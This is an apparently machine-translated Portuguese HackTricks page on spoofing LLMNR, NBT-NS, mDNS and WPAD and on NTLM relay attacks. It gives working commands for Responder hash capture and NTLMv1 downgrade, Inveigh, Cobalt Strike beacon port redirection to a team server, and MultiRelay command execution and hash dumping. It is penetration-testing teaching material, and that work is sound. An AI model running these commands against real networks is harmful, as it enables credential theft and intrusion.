# Falsificação de LLMNR, NBT-NS, mDNS/DNS e WPAD e Ataques de Relevo <details> <summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> Outras formas de apoiar o HackTricks: * Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud). </details> ## Protocolos de Rede ### Protocolos de Resolução de Host Local - **LLMNR, NBT-NS e mDNS**: - A Microsoft e outros sistemas operacionais usam LLMNR e NBT-NS para resolução de nomes locais quando o DNS falha. Da mesma forma, os sistemas Apple e Linux usam mDNS. - Esses protocolos são suscetíveis a interceptação e falsificação devido à sua natureza de difusão não autenticada sobre UDP. - O [Responder](https://github.com/lgandx/Responder) pode ser usado para se passar por serviços enviando respostas falsificadas para hosts que consultam esses protocolos. - Mais informações sobre a falsificação de serviços usando o Responder podem ser encontradas [aqui](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). ### Protocolo de Descoberta Automática de Proxy da Web (WPAD) - O WPAD permite que os navegadores descubram automaticamente as configurações de proxy. - A descoberta é facilitada via DHCP, DNS, ou recorrendo ao LLMNR e NBT-NS se o DNS falhar. - O Responder pode automatizar ataques WPAD, direcionando clientes para servidores WPAD maliciosos. ### Responder para Envenenamento de Protocolo - **Responder** é uma ferramenta usada para envenenar consultas LLMNR, NBT-NS e mDNS, respondendo seletivamente com base em tipos de consulta, visando principalmente serviços SMB. - Ele vem pré-instalado no Kali Linux, configurável em `/etc/responder/Responder.conf`. - O Responder exibe hashes capturados na tela e os salva no diretório `/usr/share/responder/logs`. - Ele suporta IPv4 e IPv6. - A versão do Windows do Responder está disponível [aqui](https://github.com/lgandx/Responder-Windows). #### Executando o Responder - Para executar o Responder com as configurações padrão: `responder -I <Interface>` - Para sondagem mais agressiva (com efeitos colaterais potenciais): `responder -I <Interface> -P -r -v` - Técnicas para capturar desafios/respostas NTLMv1 para facilitar a quebra: `responder -I <Interface> --lm --disable-ess` - A falsificação do WPAD pode ser ativada com: `responder -I <Interface> --wpad` - As solicitações NetBIOS podem ser resolvidas para o IP do atacante, e um proxy de autenticação pode ser configurado: `responder.py -I <interface> -Pv` ### Envenenamento DHCP com Responder - Falsificar respostas DHCP pode envenenar permanentemente as informações de roteamento de uma vítima, oferecendo uma alternativa mais furtiva ao envenenamento ARP. - Requer conhecimento preciso da configuração da rede alvo. - Executando o ataque: `./Responder.py -I eth0 -Pdv` - Este método pode capturar efetivamente hashes NTLMv1/2, mas requer manuseio cuidadoso para evitar interrupções na rede. ### Capturando Credenciais com Responder - O Responder se passará por serviços usando os protocolos mencionados acima, capturando credenciais (geralmente Desafio/Resposta NTLMv2) quando um usuário tenta autenticar-se contra os serviços falsificados. - Tentativas podem ser feitas para rebaixar para NetNTLMv1 ou desativar ESS para facilitar a quebra de credenciais. É crucial observar que a aplicação dessas técnicas deve ser feita de forma legal e ética, garantindo autorização adequada e evitando interrupções ou acesso não autorizado. ## Inveigh Inveigh é uma ferramenta para testadores de penetração e equipes vermelhas, projetada para sistemas Windows. Oferece funcionalidades semelhantes ao Responder, realizando falsificação e ataques de homem no meio. A ferramenta evoluiu de um script PowerShell para um binário C#, com [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) e [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) como as principais versões. Parâmetros e instruções detalhadas podem ser encontrados na [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters). Inveigh pode ser operado através do PowerShell: ```powershell Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y ``` Ou executado como um binário C#: ```bash Inveigh.exe ``` ### Ataque de Relevo NTLM Este ataque aproveita sessões de autenticação SMB para acessar uma máquina alvo, concedendo um shell de sistema se bem-sucedido. Pré-requisitos-chave incluem: - O usuário autenticado deve ter acesso de Administrador Local no host de retransmissão. - A assinatura SMB deve estar desativada. #### Encaminhamento e Tunelamento da Porta 445 Em cenários onde a introdução direta na rede não é viável, o tráfego na porta 445 precisa ser encaminhado e tunelado. Ferramentas como [**PortBender**](https://github.com/praetorian-inc/PortBender) ajudam a redirecionar o tráfego da porta 445 para outra porta, o que é essencial quando o acesso de administrador local está disponível para carregamento de driver. Configuração e operação do PortBender no Cobalt Strike: ```bash Cobalt Strike -> Script Manager -> Load (Select PortBender.cna) beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory beacon> upload C:\PortBender\WinDivert64.sys # Upload driver beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445 beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server beacon> socks 1080 # Establish a SOCKS proxy on port 1080 # Termination commands beacon> jobs beacon> jobkill 0 beacon> rportfwd stop 8445 beacon> socks stop ``` ### Outras Ferramentas para Ataque de Revezamento NTLM - **Metasploit**: Configurado com proxies, detalhes do host local e remoto. - **smbrelayx**: Um script Python para retransmissão de sessões SMB e execução de comandos ou implantação de backdoors. - **MultiRelay**: Uma ferramenta da suíte Responder para retransmitir usuários específicos ou todos os usuários, executar comandos ou extrair hashes. Cada ferramenta pode ser configurada para operar por meio de um proxy SOCKS, se necessário, permitindo ataques mesmo com acesso de rede indireto. ### Operação do MultiRelay O MultiRelay é executado a partir do diretório _**/usr/share/responder/tools**_, visando IPs ou usuários específicos. ```bash python MultiRelay.py -t <IP target> -u ALL # Relay all users python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes # Proxychains for routing traffic ``` ### Forçar Logins NTLM No Windows, **você pode ser capaz de forçar algumas contas privilegiadas a se autenticarem em máquinas arbitrárias**. Leia a seguinte página para aprender como: {% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} [printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md) {% endcontent-ref %} ## Referências * [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/) * [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/) * [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/) * [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/) * [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) <details> <summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> Outras maneiras de apoiar o HackTricks: * Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud). </details>